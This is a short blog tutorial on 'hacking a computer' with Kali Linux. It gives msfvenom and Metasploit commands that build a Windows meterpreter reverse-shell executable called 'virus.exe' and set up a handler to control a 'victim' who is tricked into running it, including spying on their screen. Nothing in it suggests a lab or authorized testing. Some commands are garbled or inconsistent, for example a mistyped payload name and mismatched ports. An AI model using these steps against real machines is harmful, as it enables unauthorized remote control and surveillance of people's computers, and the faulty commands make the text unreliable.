How to Hack Computer using KaliLinux?

Hello , Friends you are wellcome here .  My today’s is ” How to Hack Computer Using kali Linux ?”  Friends, First of all I want to tells about that Kali Linux . 
Kali Linux is one of the best passion operating system of white hat hackers, security researchers and pentester. It gives advanced penetration testing tool and its ease of use implies that it should be a part of every security professional’s toolbox.








What is KaliLinux According to Wikipedia:

Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. Kali Linux is distributed in 32-bit and 64-bit images for use on hosts based on the x86 instruction set and as an image for the ARM architecture for use on the BeagleBoard computer and on Samsung’s ARM.

Requirements:

  • Kali Linux OS (Metasploit framework Preloded)
  • Computer (Windows Installed)

So , Lets get started

Part 1 :  Create the Virus

Dear friends first of all , you create the payload(Virus) using msfvenom. Following command you will create the virus in .exe format.
Command:  msfvenom -p window/meterpreter/reverse_tcp lhost=192.168.1.103 lport=4444 -f exe .a  x86 > virus.exe  
A virus will created in the Desktop folder.
Short stories the victim download the malicious EXE  file and install it. After Victim open the application. 

Part2: How to Attack Victim Computer

Step1: First Of all Start the Metasploit Framework Console as follows :
Command: msfconsole
Wait for a few minute. Metasploit framework started.

Step2: Now after doing this next step. we need do Set payload and Port. Write the following command and after writing each command hit enter.
Command: 
msf> use multi/handler  Press Enter
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp  Press Enter
msf exploit(handler) > set LHOST “Attacker ip”  Press Enter
msf exploit(handler) > set LPORT 444  Press Enter
msf exploit(handler) > exploit Press Enter

Write the Attacker IP address in The LHOST Part , Payload Handler is  Started. Meterpreter session allows you to execute system commands, networking commands, spy the screen and much more.  You see the whole list of commands type help .

         If  you like this post please don’t  forget to share it with friends also please socialize it . thank you so much .

Leave a Comment

error: Content is protected !!